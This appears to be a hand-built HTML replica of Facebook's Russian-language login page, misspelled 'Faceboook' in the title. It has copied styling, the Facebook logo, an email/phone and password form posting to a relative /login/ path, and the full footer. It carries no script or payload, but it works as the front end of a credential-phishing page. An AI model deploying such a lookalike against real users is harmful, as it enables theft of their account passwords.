<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <title>Faceboook</title>
        <style>
            .fb_logo {
                width : 301px;
            }
            ._8eso {
                font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
                font-weight: normal;
            }
            ._8esj {
                background: #edf0f5;
            }
            ._95k9 {
                background: #f0f2f5;
                min-width: 500px;
            }
            ._8icx {
                padding-top: 82px;
            }
            ._8op_ {
                padding-bottom: 40px;
                padding-top: 62px;
            }
            ._95ka {
                padding-bottom: 112px;
                padding-top: 72px;
            }
            ._8esk {
                margin: 0 auto;
                padding: 20px 0;
                position: relative;
                width: 980px;
            }
            ._8esf ._8esl {
                box-sizing: border-box;
                margin-right: 0;
                padding-right: 32px;
                width: 580px;
            }
            ._8esl { /*проверить*/
                display: inline-block;
                margin-right: 15.999px;
                vertical-align: top;
                width: 565px;
            }
            #facebook ._8icx._8opv ._8ice { /*проверить*/
                padding: 112px 0 16px;
            }
            #facebook ._8icx ._8ice { /*проверить*/
                padding: 0 0 24px;
            }
            ._8icx._8opv ._8ilh {
                height: 106px;
                margin: -28px;
            }
            #facebook ._8esj._8esf._8icx._8opv ._8eso {
                font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
                font-size: 28px;
                font-weight: normal;
                line-height: 32px;
                width: 500px;
            }
            #facebook ._8esj._8esf._8icx ._8eso {
                font-size: 24px;
                line-height: 32px;
                padding: 0 0 20px;
            }
            #facebook ._8esj._8esf._8ilg ._8eso {
                font-size: 24px;
                line-height: 32px;
                padding: 60px 0 20px;
            }
            #facebook ._8esj._8esf ._8eso {
                color: #1c1e21;
                font-family: SFProDisplay-Bold, Helvetica, Arial, sans-serif;
                font-size: 32px;
                font-weight: bold;
                line-height: 38px;
                width: 471px;
            }
            #facebook ._8esj._8icx ._8eso {
                padding-top: 0;
            }
            #facebook ._8esj ._8eso {
                color: #333;
                display: inline-block;
                font-family: 'Freight Sans Bold', Helvetica, Arial, sans-serif;
                font-size: 28px;
                font-weight: bold;
                letter-spacing: normal;
                line-height: 36px;
                padding: 42px 0 24px;
                text-rendering: optimizelegibility;
                width: 456px;
            }
            ._8esn {
                display: inline-block;
                vertical-align: top;
            }
            ._8iep {
                height: 456px;
                width: 396px;
            }
            ._8icy ._6luv {
                padding-bottom: 24px;
                padding-top: 10px;
            }
            ._6luv {
                align-items: center;
                background-color: #fff;
                border: none;
                border-radius: 8px;
                box-shadow: 0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);
                box-sizing: border-box;
                margin: 40px 0 0;
                padding: 20px 0 28px;
                width: 396px;
            }
            ._52jv {
                text-align: center;
            }
            ._8icy ._6lux {
                font-size: 17px;
                width: 364px;
            }
            ._6lux {
                display: inline-block;
                font-size: 14px;
                margin: auto;
                padding: 6px 0;
                width: 302px;
            }
            .inputtext, .inputpassword {
                padding-bottom: 4px;
            }
            html ._55r1 {
                background: #FFFFFF url(/rsrc.php/v3/yO/r/YQNfPR9MJfx.png) repeat-x;
                border: 1px solid #dddfe2;
                color: #1d2129;
                font-family: Helvetica, Arial, sans-serif;
                font-size: 12px;
                height: 22px;
                line-height: 16px;
                padding: 0 8px;
                vertical-align: middle;
            }
            ._8icy ._6lux ._6luy, ._9aha ._6lux ._6luy {
                border-radius: 6px;
            }
            ._8icy ._6lux ._6luy {
                font-size: 17px;
                padding: 14px 16px;
                width: 330px;
            }
            ._6lux ._6luy {
                font-size: 14px;
                padding: 5px 8px;
                width: 284px;
            }
            ._6ltg {
                padding-top: 6px;
            }
            ._42ft {
                cursor: pointer;
                display: inline-block;
                text-decoration: none;
                white-space: nowrap;
            }
            ._4jy0 {
                transition: 200ms cubic-bezier(.08,.52,.52,1) background-color, 200ms cubic-bezier(.08,.52,.52,1) box-shadow, 200ms cubic-bezier(.08,.52,.52,1) transform;
            }
            ._4jy0 {
                border: 1px solid;
                border-radius: 2px;
                box-sizing: content-box;
                font-size: 12px;
                -webkit-font-smoothing: antialiased;
                font-weight: bold;
                justify-content: center;
                padding: 0 8px;
                position: relative;
                text-align: center;
                text-shadow: none;
                vertical-align: middle;
            }
            ._4jy0:before {
                content: '';
                display: inline-block;
                height: 20px;
                vertical-align: middle;
            }
            ._6lth {
                font-size: 14px;
                width: 252px;
            }
            ._4jy6, ._4jy6._42fr:active, ._4jy6._42fr._42fs {
                line-height: 42px;
                padding: 0 24px;
            }
            ._8icy ._6ltj {
                margin-top: 16px;
            }
            ._6ltj {
                margin-top: 12px;
            }
            ._8icy ._8icz {
                align-items: center;
                border-bottom: 1px solid #dadde1;
                display: flex;
                margin: 20px 16px;
                text-align: center;
            }
            ._8icy ._6lti {
                border: none;
                border-radius: 6px;
                font-size: 17px;
                line-height: 48px;
                padding: 0 16px;
            }
            ._6lti {
                font-size: 14px;
            }
            ._4jy6, ._4jy6._42fr:active, ._4jy6._42fr._42fs {
                line-height: 42px;
                padding: 0 24px;
            }
            ._4jy2 {
                background-color: #42b72a;
                border-color: #42b72a;
            }
            ._4jy1, ._4jy2 {
                color: #fff;
            }
            #facebook ._8esf ._58mk {
                border-top: none;
                color: #1c1e21;
                font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
                font-size: 14px;
                font-weight: normal;
                padding-top: 0;
            }
            ._8ilg ._58mk, ._8icx ._58mk {
                margin-top: 28px;
                text-align: center;
            }
            ._8f3m ._58mk {
                margin-top: 42px;
                text-align: center;
            }
            ._58mk {
                border-top: 1px solid #dddfe2;
                color: #666;
                font-size: 13px;
                font-weight: bold;
                margin-top: 10px;
                padding-top: 15px;
            }
            ._8opy {
                padding-top: 20px;
            }
            #pageFooter {
                color: #737373;
                margin: 0 auto;
                width: 980px;
            }
            .localeSelectorList {
                align-items: center;
                display: flex;
                flex-wrap: wrap;
            }
            ._2pid {
                padding-top: 8px;
            }
            #contentCurve {
                border-bottom: 1px solid #dddfe2;
                font-size: 1px;
                height: 8px;
                margin-bottom: 8px;
            }
            #pageFooter .pageFooterLinkList {
                line-height: 1.6;
                margin-left: -20px;
            }
            #facebook .accessible_elem {
                clip: rect(1px, 1px, 1px, 1px);
                height: 1px;
                overflow: hidden;
                position: absolute;
                white-space: nowrap;
                width: 1px;
            }
            .mvl {
                margin-top: 20px;
                margin-bottom: 20px;
            }
            #pageFooter .copyright {
                font-size: 11px;
            }
            ._8icy ._6lth {
                background-color: #1877f2;
                border: none;
                border-radius: 6px;
                font-size: 20px;
                line-height: 48px;
                padding: 0 16px;
                width: 332px;
            }
            ._8icy ._6ltj a {
                color: #1877f2;
                font-size: 14px;
                font-weight: 500;
            }
            a {
                color: #385898;
                cursor: pointer;
                text-decoration: none;
            }
            #facebook ._8esf ._58mk {
                color: rgb(28, 30, 33);
                font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
                font-size: 14px;
                font-weight: normal;
                padding-top: 0px;
                border-top: none;
            }
            body, button, input, label, select, td, textarea {
                font-family: Helvetica, Arial, sans-serif;
                font-size: 12px;
            }
            body {
                color: rgb(28, 30, 33);
                direction: ltr;
                line-height: 1.34;
                unicode-bidi: embed;
                background: rgb(255, 255, 255);
                margin: 0px;
                padding: 0px;
            }
            ._2pid {
                padding-top: 8px;
            }
            ul {
                list-style-type: none;
                margin: 0px;
                padding: 0px;
            }
            ul {
                margin-block-start: 1em;
                margin-block-end: 1em;
                margin-inline-start: 0px;
                margin-inline-end: 0px;
                padding-inline-start: 40px;
            }
        </style>
    </head>
    <body>
        <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
            <div class="_8esk">
                <div class="_8esl">
                    <div class="_8ice">
                        <img class="fb_logo _8ilh img" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook">
                    </div>
                    <h2 class="_8eso">Facebook помогает вам всегда оставаться на связи и общаться со своими знакомыми.</h2>
                </div>
                <div class="_8esn"><div class="_8iep _8icy _9ahz _9ah-"><div class="_6luv _52jv">
                    <form class="_featuredLogin__formContainer" data-testid="royal_login_form" action="/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjEyODgxNDk5LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D" method="post" onsubmit="" id="u_0_a">
                        <input type="hidden" name="jazoest" value="2934" autocomplete="off">
                        <input type="hidden" name="lsd" value="AVp7nSL0_Uw" autocomplete="off">
                        <div>
                            <div class="_6lux">
                                <input type="text" class="inputtext _55r1 _6luy" name="email" id="email" data-testid="royal_email" placeholder="Электронный адрес или номер телефона" autofocus="1" aria-label="Электронный адрес или номер телефона">
                            </div>
                            <div class="_6lux">
                                <input type="password" class="inputtext _55r1 _6luy" name="pass" id="pass" data-testid="royal_pass" placeholder="Пароль" aria-label="Пароль">
                            </div>
                        </div>
                        <input type="hidden" autocomplete="off" name="login_source" value="comet_headerless_login">
                        <input type="hidden" autocomplete="off" name="next" value="">
                        <div class="_6ltg"><button value="1" class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login" data-testid="royal_login_button" type="submit" id="u_0_b">Вход</button>
                        </div>
                        <div class="_6ltj">
                            <a href="https://www.facebook.com/recover/initiate/?ars=facebook_login&amp;privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjEyODgxNDk5LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D">Забыли пароль?</a></div><div class="_8icz"></div><div class="_6ltg"><a role="button" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="#" ajaxify="/reg/spotlight/" id="u_0_2" data-testid="open-registration-form-button" rel="async">Создать аккаунт
                            </a>
                        </div>
                    </form>
                </div>
                <div id="reg_pages_msg" class="_58mk">
                    <a href="/pages/create/?ref_type=registration_form" class="_8esh">Создать Страницу
                    </a> знаменитости, музыкальной группы или компании.
                </div>
                </div>
            </div>
        </div>
    </div>
    <div class="_8opy">
        <div class="_95ke">
            <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
                <ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
                    <li>Русский</li>
                    <li><a class="_sv4" dir="ltr" href="https://www.facebook.com/" title="English (US)">English (US)
                    </a>
                </li>
                <li>
                    <a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/" title="Turkish">Türkçe
                    </a>
                    </li>
                    <li>
                        <a class="_sv4" dir="ltr" href="https://id-id.facebook.com/" title="Indonesian">Bahasa Indonesia</a>
                    </li>
                    <li>
                        <a class="_sv4" dir="ltr" href="https://kk-kz.facebook.com/" title="Kazakh">Қазақша
                        </a>
                    </li>
                    <li>
                        <a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/" title="Simplified Chinese (China)">中文(简体)
                        </a>
                    </li>
                    <li>
                        <a class="_sv4" dir="ltr" href="https://de-de.facebook.com/" title="German">Deutsch</a>
                    </li>
                    <li>
                        <a class="_sv4" dir="ltr" href="https://ko-kr.facebook.com/" title="Korean">한국어</a>
                    </li>
                    <li>
                        <a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/" title="Albanian">Shqip</a>
                    </li>
                    <li>
                        <a class="_sv4" dir="ltr" href="https://es-la.facebook.com/" title="Spanish">Español</a>
                    </li><li><a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/" title="Portuguese (Brazil)">Português (Brasil)
                    </a>
                </li>
                <li>
                    <a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fpt-br.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Ещё языки">
                        <i class="img sp_9-wrMfOJ0eG sx_2998c7">

                        </i>
                    </a>
                </li>
            </ul>
            <div id="contentCurve">

            </div>
            <div id="pageFooterChildren" role="contentinfo" aria-label="Ссылки Facebook">
                <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
                    <li>
                        <a href="/r.php" title="Регистрация на Facebook">Регистрация
                        </a>
                    </li>
                    <li>
                        <a href="/login/" title="Войдите на Facebook">Вход
                        </a>
                    </li>
                    <li>
                        <a href="https://messenger.com/" title="Оцените Messenger.">Messenger
                        </a>
                    </li>
                    <li>
                        <a href="/lite/" title="Facebook Lite для Android.">Facebook Lite
                        </a>
                    </li>
                    <li>
                        <a href="https://www.facebook.com/watch/" title="Посмотреть наши видео на Facebook Watch."> Watch 
                        </a>
                    </li>
                    <li>
                        <a href="/directory/people/" title="Посмотрите наш каталог пользователей.">Люди</a>
                    </li>
                    <li>
                        <a href="/directory/pages/" title="Просматривайте наш каталог Страниц.">Страницы</a>
                    </li>
                    <li>
                        <a href="/pages/category/">Категории Страниц</a>
                    </li>
                    <li><a href="/places/" title="Ознакомьтесь с популярными местами на Facebook.">Места</a></li>
                    <li><a href="/games/" title="Познакомьтесь с играми на Facebook.">Игры</a></li>
                    <li><a href="/directory/places/" title="Просмотрите наш каталог мест.">Места</a></li>
                    <li><a href="/marketplace/" title="Покупайте и продавайте через Facebook Marketplace.">Marketplace</a></li>
                    <li><a href="https://pay.facebook.com/" target="_blank" title="Подробнее о Facebook Pay">Facebook Pay</a></li>
                    <li><a href="/directory/groups/" title="Просмотреть наш каталог групп.">Группы</a></li>
                    <li><a href="/jobs/" title="Отправляйте заявки на замещение вакансий и нанимайте персонал на Facebook.">Вакансии</a></li>
                    <li><a href="https://www.oculus.com/" target="_blank" title="Подробнее об Oculus">Oculus</a></li>
                    <li><a href="https://portal.facebook.com/" target="_blank" title="Подробнее о Portal from Facebook">Portal</a></li>
                    <li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3L8HorcI_B0aBfcaPTS-LO0ZLeJr8J0uPwUl7dX3CT6NV9roNZIqtQpr6gysZ-3uat724Fc2WXxj7D9xpaOFL9GjRL1d4CYL5Il5lxh_k5NiEPvmJwIfbFQ_dD7dfnOFAOApdk7eFWKcK4T8NEH4dsIBQ" title="Попробуйте Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li>
                    <li><a href="/local/lists/245019872666104/" title="Просмотреть наш каталог &quot;Местные списки&quot;.">Местные</a></li>
                    <li><a href="/fundraisers/" title="Пожертвовать в поддержку общественно значимых дел">Благотворительные акции</a></li>
                    <li><a href="/biz/directory/" title="Посмотреть наш каталог &quot;Сервисы Facebook&quot;.">Услуги</a></li>
                    <li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Перейти в Центр информации о голосовании.">Центр информации о голосовании</a></li>
                    <li><a href="/facebook" accesskey="8" title="Прочтите наш блог, ознакомьтесь с материалами, найдите  вакансии.">О нас</a></li>
                    <li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Реклама на  Facebook.">Создать рекламу</a></li>
                    <li><a href="/pages/create/?ref_type=site_footer" title="Создать Страницу">Создать Страницу</a></li>
                    <li><a href="https://developers.facebook.com/?ref=pf" title="Развивайтесь на нашей платформе.">Разработчикам</a></li>
                    <li><a href="/careers/?ref=pf" title="Сделайте следующий шаг в карьере в нашей отличной компании.">Вакансии</a></li>
                    <li><a data-nocookies="1" href="/privacy/explanation" title="Узнайте о своей конфиденциальности на Facebook.">Конфиденциальность</a></li>
                    <li><a href="/policies/cookies/" title="Узнайте больше о cookies и Facebook." data-nocookies="1">Файлы cookie</a></li>
                    <li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Подробнее о выборе рекламы.">Выбор рекламы<i class="img sp_9-wrMfOJ0eG sx_656b76"></i></a></li>
                    <li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Просмотрите наши условия и правила.">Условия использования</a></li>
                    <li><a href="/help/?ref=pf" accesskey="0" title="Посетите наш Справочный центр.">Справка</a></li>
                    <li><a accesskey="6" class="accessible_elem" href="/settings" title="Посмотреть и отредактировать настройки Facebook.">Настройки</a></li>
                    <li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="Посмотреть Журнал действий">Журнал действий</a></li>
                </ul>
            </div>
            <div class="mvl copyright">
                <div>
                    <span> Facebook © 2021</span>
                </div>
            </div>
        </div>
    </div>
</div>
    </body>
</html>
